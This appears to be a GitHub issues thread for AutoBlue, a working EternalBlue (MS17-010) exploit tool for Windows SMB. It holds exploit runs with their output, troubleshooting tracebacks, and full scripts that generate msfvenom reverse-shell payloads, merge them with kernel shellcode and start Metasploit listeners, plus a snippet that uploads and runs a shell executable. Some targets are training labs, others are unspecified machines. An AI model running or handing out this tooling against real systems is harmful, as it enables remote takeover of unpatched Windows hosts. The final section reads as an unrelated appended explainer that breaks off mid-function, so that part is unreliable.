3ndg4me / autoblue-ms17-010
This is just a semi-automated, fully working, no-bs, non-metasploit version of the public exploit code for MS17-010
License: MIT License
Hi,
I'm having some issues with this code.
I tried using it and it does connect back to my attacking box however there is no shell (cmd.exe)
I was expecting something like this:
C:\Windows\system32>
I tried it against several machines, mostly Windows 7 & Server 2008 which I knew to be vulnerable.
I even tried inputting a different numGroomConn number but with no visible results.
Any thoughts?
python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_OBJECT_NAME_NOT_FOUND
python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49179.
python eternalblue_checker.py 10.x.x.x
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: Ok (64 bit)
netlogon: Ok (64 bit)
lsarpc: Ok (64 bit)
browser: STATUS_ACCESS_DENIED
python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.x.x.x] from (UNKNOWN) [10.x.x.x] 49218
python eternalblue_checker.py 10.x.x.x
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
python eternalblue_exploit7.py 10.x.x.x shellcode/sc_all.bin
shellcode size: 2292
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
nc -nlvp 4444
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.x.x.x.
Ncat: Connection from 10.x.x.x:49157.
Hello,
I am having an issue with the Relevant CTF (https://tryhackme.com/room/relevant) using AutoBlue. I see some walkthroughs using it successfully - so the command should work.
As requested, I have filed this as a new issue, as this indeed does occur in latest impacket, latest Python, in a clean Miniconda docker environment (as well as on my host, Kali Linux 2021.1).
The following steps will reproduce this issue:
docker run -i -t continuumio/miniconda3 /bin/bash
conda create -n py397 python=3.9.7
conda activate py397
pip install git+https://github.com/SecureAuthCorp/impacket
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010
python3 zzz_exploit.py 'RELEVANT/Bill:[email protected]'
Yielding the following results:
[*] Target OS: Windows Server 2016 Standard Evaluation 14393
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
File "/AutoBlue-MS17-010/zzz_exploit.py", line 1112, in <module>
main()
File "/AutoBlue-MS17-010/zzz_exploit.py", line 1109, in main
exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
File "/AutoBlue-MS17-010/zzz_exploit.py", line 980, in exploit
if not info['method'](conn, pipe_name, info):
File "/AutoBlue-MS17-010/zzz_exploit.py", line 469, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/AutoBlue-MS17-010/zzz_exploit.py", line 313, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/AutoBlue-MS17-010/mysmb.py", line 375, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/AutoBlue-MS17-010/mysmb.py", line 83, in _put_trans_data
transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes
Thank you for your time.
Hello, what's wrong with this? My Python is 3.7.2, and my impacket is the latest.
(py3) C:\Users\admin\Downloads\AutoBlue-MS17-010-master>python zzz_exploit.py test:[email protected]
[*] Target OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[-] Could not open /usr/share/metasploit-framework/data/wordlists/named_pipes.txt, trying hardcoded values
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
Traceback (most recent call last):
File "zzz_exploit.py", line 1112, in <module>
main()
File "zzz_exploit.py", line 1109, in main
exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
File "zzz_exploit.py", line 980, in exploit
if not info['method'](conn, pipe_name, info):
File "zzz_exploit.py", line 469, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "zzz_exploit.py", line 313, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 375, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "C:\Users\admin\Downloads\AutoBlue-MS17-010-master\mysmb.py", line 83, in _put_trans_data
transData += (b'\x00' * padLen) + data
TypeError: can't concat str to bytes
eython eternalblue_checker.py 96.126..
[*] exec: python eternalblue_checker.py 96.126..*
Traceback (most recent call last):
File "eternalblue_checker.py", line 42, in
conn.login(USERNAME, PASSWORD)
File "/root/autoblue/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3340, in login
self.login_extended(user, password, domain, lmhash, nthash, use_ntlmv2 = True)
File "/root/autoblue/mysmb.py", line 160, in login_extended
Target OS:
smb.SMB.login_extended(self, user, password, domain, lmhash, nthash, use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/smb.py", line 3250, in login_extended
type3, exportedSessionKey = ntlm.getNTLMSSPType3(auth, respToken['ResponseToken'], user, password, domain, lmhash, nthash, use_ntlmv2 = use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 618, in getNTLMSSPType3
ntResponse, lmResponse, sessionBaseKey = computeResponse(ntlmChallenge['flags'], ntlmChallenge['challenge'], clientChallenge, serverName, domain, user, password, lmhash, nthash, use_ntlmv2 )
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 36, in computeResponse
lmhash, nthash, use_ntlmv2=use_ntlmv2)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 899, in computeResponseNTLMv2
av_pairs = AV_PAIRS(serverName)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 206, in init
self.fromString(data)
File "/usr/lib/python2.7/dist-packages/impacket/ntlm.py", line 229, in fromString
fType = struct.unpack('<H',tInfo[:struct.calcsize('<H')]
Help!!!!!!
I'd like to know how to generate bind shell payload, please.
./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")
I am trying to use the exploit on my Win7 PC. I don't know how to set it up. Which version of Python should I use? Thanks
I got this error:
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 10 Pro 10240
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out
The eternal_checker.py has also detected that the version of Windows 10 that I'm exploiting has not been patched.
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
Y
./shell_prep.sh: 18: ./shell_prep.sh: Syntax error: "(" unexpected (expecting "then")
Hello, I have an issue with module name pyasn1.type.univ when running python2 and module name impacket when running python3. I'm running the eternalblue_exploit7.py file and I don't know why it's always showing that error, and I am already stuck on how to fix the issues. My OS is Kali Linux. Can you help me solve this issue?
$ python eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin 1 ⨯
Traceback (most recent call last):
File "eternalblue_exploit10.py", line 2, in <module>
from impacket import smb, ntlm
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 49, in <module>
from pyasn1.type.univ import noValue
ImportError: No module named pyasn1.type.univ
$ python3 eternalblue_exploit10.py 172.16.182.130 shellcode/sc_all.bin 1 ⨯
Traceback (most recent call last):
File "/home/avv-kali/Documents/Offensive Security/Tools/Exploitation/AutoBlue-MS17-010/eternalblue_exploit10.py", line 2, in <module>
from impacket import smb, ntlm
ModuleNotFoundError: No module named 'impacket'
root@kali:/AutoBlue-MS17-010# python eternal_checker.py 192.168.0.101
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/AutoBlue-MS17-010/mysmb.py", line 122, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2437, in init
self.neg_session()
File "/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2657, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2521, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 997, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
raise NetBIOSError('Error occurs while reading from remote', ERRCLASS_OS, ex[0])
impacket.nmb.NetBIOSError: Error occurs while reading from remote(104)
From kali, I am trying to use the eternalblue_exploit10.py, I tried on several W10 machines (all not patched according to eternal_checker.py), and after I run the command the W10 VM crashes.
Target machine Microsoft Windows Version 10.0 (Build 10240)
Here's the output of the command in my Kali VM:
```
python3 eternalblue_exploit10.py 192.168.202.137 shellcode/sc_all.bin
shellcode size: 2307
numGroomConn: 13
Target OS: Windows 10 Home 10240
got good NT Trans response
got good NT Trans response
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status for nx: INVALID_PARAMETER
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
^^^^^^^^^^^^^^^^^^^^^^^^^^^
TimeoutError: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 599, in
exploit(TARGET, sc, numGroomConn)
File "/home/kali/EternalBlue/AutoBlue-MS17-010/eternalblue_exploit10.py", line 570, in exploit
nxconn.disconnect_tree(tid)
File "/usr/lib/python3/dist-package.py", line 2886, in disconnect_tree
self.recvSMB()
File "/usr/lib/python3/dist-package.py", line 2592, in recvSMB
r = self.sess.recv_packet(self.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 915, in recv_packet
data = self.__read(timeout)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 1002, in __read
data = self.read_function(4, time
^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-package.py", line 986, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETB with the remote host timed out.
```
I would like to enable this in the file instead of the shell
smbConn = conn.get_smbconnection()
smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
service_exec(conn, r'c:\test.exe')
Is this possible because I am testing with a WinXP host and scripts do not work against that machine.
I'm sorry if this post is not appropriate as an issue. I can't find any sources on how to use this tool and generate a bind shell instead of a reverse shell.
I am learning to exploit without metasploit. I came across autoblue when attempting to do so in HTB-blue.
When I do python eternal_checker.py
I get errors
Line 427 in mysmb.py:
except Exception as e:
Line 567 in mysmb.py
except Exception, e:
I am stuck on how best to use it, py2 or py3. I tried using py2 and
msf5
after python eternalblue_exploit7.py [IP:XX:XX:XX] shellcode/sc_all.bin
Help please
My Kali Release: 2021.1
When I run the command, I get the error message below:
┌──(kali㉿kali)-[~/blue]
└─$ python3 ./eternalblue_exploit10.py 10.10.10.40 ./shellcode/sc_all.bin
Traceback (most recent call last):
File "/home/kali/blue/./eternalblue_exploit10.py", line 74, in
ntfea9000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x260 # with these fea, ntfea size is 0x1c80
TypeError: can't concat str to byt
I have run the command line below before running it.
┌──(kali㉿kali)-[~/blue]
└─$ pip install -r requirements.txt 1 ⨯
Requirement already satisfied: impacket in /usr/local/lib/python3.9/dist-packages/impacket-0.9.23-py3.9.egg (from -r requirements.txt (line 1)) (0.9.23)
Requirement already satisfied: chardet in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (4.0.0)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.1.2)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.8.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.3)
Requirement already satisfied: pyOpenSSL>=0.16.2 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (20.0.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.8)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.9.7)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.15.0)
I thought it was related to a Python version issue, but I don't know how to fix it. As you mentioned it supports Python 3, would you please have a look? I am new to Python :(
HTB Blue box https://app.hackthebox.eu/machines/Blue
Computer : HARIS-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
I need to run use auxiliary/scanner/smb/pipe_auditor before use multi_handler.
Also, it might be the reason why non-meterpreter shells are not working, because there is no pipe set.
python eternalblue_checker.py xxx.xxx.xxx.xxx
Target OS:
Traceback (most recent call last):
File "eternalblue_checker.py", line 42, in <module>
conn.login(USERNAME, PASSWORD)
File "/root/AutoBlue-MS17-010/mysmb.py", line 152, in login
smb.SMB.login(self, user, password, domain, lmhash, nthash, ntlm_fallback)
TypeError: login() takes at most 6 arguments (7 given)
Hi,
I'm doing my pentesting via a locally installed Pi that offers an OpenVPN connection for me. The Pi is in the LAN of the client and I use that in combination with a Kali install that connects via VPN.
I don't think I can compile the shellcode on the Pi, so I did that on Kali. I cannot start the listener on Kali however, because it has no IP on the client's LAN. It has a TUN interface in another range.
Can the code be changed so I can use a listener on another host?
Cheers,
BC
I made the following changes to improve portability, readability, and organization:
- Replaced double square brackets with single square brackets: `[[ ... ]]` with `[ ... ]` to ensure compatibility with various shell interpreters.
- Simplified nested `if` statements for better readability and clarity.
- Used the `-p` option with the `read` command to display a prompt message directly on the same line. 💻
- Consolidated common code:
#!/bin/bash
cat << "EOF"
__
/,-
||)
\\_, )
`--'
EOF
echo Eternal Blue Metasploit Listener
echo
echo LHOST for reverse connection:
read ip
echo LPORT for x64 reverse connection:
read portOne
echo LPORT for x86 reverse connection:
read portTwo
echo Enter 0 for meterpreter shell or 1 for regular cmd shell:
read cmd
# Changes made for better portability and clarity
if [ "$cmd" -eq 0 ]; then
    read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
    if [ "$staged" -eq 0 ]; then
        echo "Starting listener (staged)..."
        # write a one-off msfconsole resource script, run it, then remove it
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/meterpreter/reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    elif [ "$staged" -eq 1 ]; then
        echo "Starting listener (stageless)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/meterpreter_reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/meterpreter/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    fi
elif [ "$cmd" -eq 1 ]; then
    read -p "Type 0 if this is a staged payload or 1 if it is for a stageless payload: " staged
    if [ "$staged" -eq 0 ]; then
        echo "Starting listener (staged)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/shell/reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/shell/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    elif [ "$staged" -eq 1 ]; then
        echo "Starting listener (stageless)..."
        touch config.rc
        echo "use exploit/multi/handler" > config.rc
        echo "set PAYLOAD windows/x64/shell_reverse_tcp" >> config.rc
        echo "set LHOST $ip" >> config.rc
        echo "set LPORT $portOne" >> config.rc
        echo "set ExitOnSession false" >> config.rc
        echo "set EXITFUNC thread" >> config.rc
        echo "exploit -j" >> config.rc
        echo "set PAYLOAD windows/shell/reverse_tcp" >> config.rc
        echo "set LPORT $portTwo" >> config.rc
        echo "exploit -j" >> config.rc
        /etc/init.d/postgresql start
        msfconsole -r config.rc
        /etc/init.d/postgresql stop
        rm config.rc
    fi
else
    echo "Invalid option...exiting..."
fi
/home/w/Do/H/N/AutoBlue-MS17-010 on master !8 ?1 ✔ ▓▒░ python eternal_checker.py 10.10.10.178
Traceback (most recent call last):
File "eternal_checker.py", line 89, in
main()
File "eternal_checker.py", line 66, in main
conn = MYSMB(options.target_ip, int(options.port))
File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 122, in init
smb.SMB.init(self, remote_host, remote_host, timeout=timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2427, in init
self.neg_session()
File "/home/warmachine/Documentos/HTB/Nest/AutoBlue-MS17-010/mysmb.py", line 178, in neg_session
smb.SMB.neg_session(self, extended_security=self.__use_ntlmv2, negPacket=negPacket)
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2642, in neg_session
smb = self.recvSMB()
File "/usr/local/lib/python2.7/dist-packages/impacket/smb.py", line 2506, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 914, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 996, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python2.7/dist-packages/impacket/nmb.py", line 983, in non_polling_read
received = self._sock.recv(bytes_left)
socket.error: [Errno 104] Connection reset by peer
If I run shell_prep.sh I get a compilation error
```
./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
eternalblue_kshellcode_x64.asm: fatal: unable to open output file sc_x64_kernel.bin'
```
but if I run shell_prep.sh with sudo permissions it does not give me problems
```
sudo ./shell_prep.sh
.-;;-.
'-..-'| || |
'-..-'|.-;;-.|
'-..-'| || |
'-..-'|.-''-.|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
n
Okay cool, make sure you merge your own shellcode properly :)
DONE
```
After doing every step perfectly, I come up with this error: "No route to host". What is the solution for this?
I've confirmed the target is vulnerable (blue - HTB).
I've created the shellcode without errors.
I've started the listener without errors.
I get the following error when attempting the eternalblue exploit.
root@host/opt/AutoBlue-MS17-010# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin 12
shellcode size: 2203
numGroomConn: 12
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Any suggestions?
I am running this against Blue on HTB. I keep getting the following error. I am able to ping the host. I have tried restarting the machine multiple times. I am on kali 2021.3-vmware-amd64.
python3 eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
shellcode size: 2205
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 984, in non_polling_read
received = self._sock.recv(bytes_left)
socket.timeout: timed out
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 563, in <module>
exploit(TARGET, sc, numGroomConn)
File "/root/hackthebox/blue/AutoBlue-MS17-010/eternalblue_exploit7.py", line 544, in exploit
conn.disconnect_tree(tid)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2886, in disconnect_tree
self.recvSMB()
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/smb.py", line 2592, in recvSMB
r = self._sess.recv_packet(self.__timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 915, in recv_packet
data = self.__read(timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 1002, in __read
data = self.read_function(4, timeout)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.25.dev1+20211027.123255.1dad8f7f-py3.9.egg/impacket/nmb.py", line 986, in non_polling_read
raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
Got this error; I tried many different ports, still the same issue.
Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444)
I have no issues using Metasploit (ms17_010_eternalblue) alone to perform the same type of attack. This works.
Several modifications have been implemented to enhance portability and resolve compatibility issues associated with the use of double brackets `[[ ... ]]`.
- Compatibility with different shell interpreters: replaced double brackets `[[ ... ]]` with single brackets `[ ... ]` to ensure compatibility with various shell interpreters.
- Code simplification: streamlined certain sections of the code to enhance readability and organization.
- Usage of `-p` with the `read` command: employed the `-p` option with the `read` command to display a prompt message directly on the same line. 💻
#!/bin/bash
set -e
cat << "EOF"
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
EOF
echo Eternal Blue Windows Shellcode Compiler
echo
echo Let\'s compile them windoos shellcodezzz
echo
echo Compiling x64 kernel shellcode
nasm -f bin eternalblue_kshellcode_x64.asm -o sc_x64_kernel.bin
echo 'Compiling x86 kernel shellcode'
nasm -f bin eternalblue_kshellcode_x86.asm -o sc_x86_kernel.bin
echo kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? \(Y\/n\)
read genMSF
if [ "$genMSF" = "y" ] || [ "$genMSF" = "Y" ]; then
    read -p "LHOST for reverse connection: " ip
    read -p "LPORT you want x64 to listen on: " portOne
    read -p "LPORT you want x86 to listen on: " portTwo
    read -p "Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell: " cmd
    if [ "$cmd" -eq 0 ]; then
        read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
        if [ "$staged" -eq 0 ]; then
            echo "Generating x64 meterpreter shell (staged)..."
            msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        elif [ "$staged" -eq 1 ]; then
            echo "Generating x64 meterpreter shell (stageless)..."
            msfvenom -p windows/x64/meterpreter_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        else
            echo "Invalid option...exiting..."
            exit 1
        fi
    elif [ "$cmd" -eq 1 ]; then
        read -p "Type 0 to generate a staged payload or 1 to generate a stageless payload: " staged
        if [ "$staged" -eq 0 ]; then
            echo "Generating x64 cmd shell (staged)..."
            msfvenom -p windows/x64/shell/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        elif [ "$staged" -eq 1 ]; then
            echo "Generating x64 cmd shell (stageless)..."
            msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=$ip LPORT=$portOne
        else
            echo "Invalid option...exiting..."
            exit 1
        fi
    else
        echo "Invalid option...exiting..."
        exit 1
    fi
    echo "MERGING SHELLCODE WOOOO!!!"
    cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin
    cat sc_x86_kernel.bin sc_x86_msf.bin > sc_x86.bin
    python3 eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
else
    echo "Okay cool, make sure you merge your own shellcode properly :)"
fi
echo "DONE"
exit 0
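Both pull-request rewrites above replace `[[ ... ]]` with `[ ... ]` for portability, and the `Syntax error: "(" unexpected (expecting "then")` reported twice earlier in this thread is what dash (the /bin/sh on Debian-based systems such as Kali) prints when it is asked to run a script containing bash-only syntax such as a `[[ ... =~ ^(...)$ ]]` test. Two things the rewrites keep are worth a note: `read -p` is not specified by POSIX (in ksh, `read -p` reads from a co-process rather than printing a prompt), and `[ "$cmd" -eq 0 ]` aborts with an "integer expression expected" error instead of falling through to the invalid-option branch when the user presses Enter or types a letter. The following is an added example, not code from the repository or from either pull request, showing prompt and validation helpers that behave the same under dash, ash, bash and ksh: prompts are printed with `printf`, menu choices are checked with `=` string comparison, and port and IPv4 inputs are screened with `case` patterns before any numeric test runs. All function and variable names are my own.

```shell
#!/bin/sh
# Added example (not part of AutoBlue-MS17-010): POSIX-sh prompting and
# input-validation helpers. No [[ ]], no read -p, no -eq on unchecked input.

# prompt LABEL: print LABEL to stderr (so command substitution captures only
# the answer), read one line with backslashes preserved, and echo it.
# Returns 1 at end of input so callers can stop looping.
prompt() {
    printf '%s' "$1" >&2
    read -r _reply || return 1
    printf '%s\n' "$_reply"
}

# validate_choice VALUE ALLOWED...: succeed (and echo VALUE) only when VALUE
# is exactly one of the ALLOWED strings. String comparison with = never
# errors, unlike [ "$x" -eq 0 ] with an empty or non-numeric $x.
validate_choice() {
    _value=$1
    shift
    for _allowed in "$@"; do
        if [ "$_value" = "$_allowed" ]; then
            printf '%s\n' "$_value"
            return 0
        fi
    done
    return 1
}

# is_port VALUE: true only for an integer in 1..65535. The case pattern
# rejects empty strings, non-digits and over-long input before -ge/-le run.
is_port() {
    case $1 in
        ''|*[!0-9]*|??????*) return 1 ;;
    esac
    if [ "$1" -ge 1 ] && [ "$1" -le 65535 ]; then
        return 0
    fi
    return 1
}

# is_ipv4 VALUE: four dot-separated decimal octets, each 0..255.
is_ipv4() {
    case $1 in
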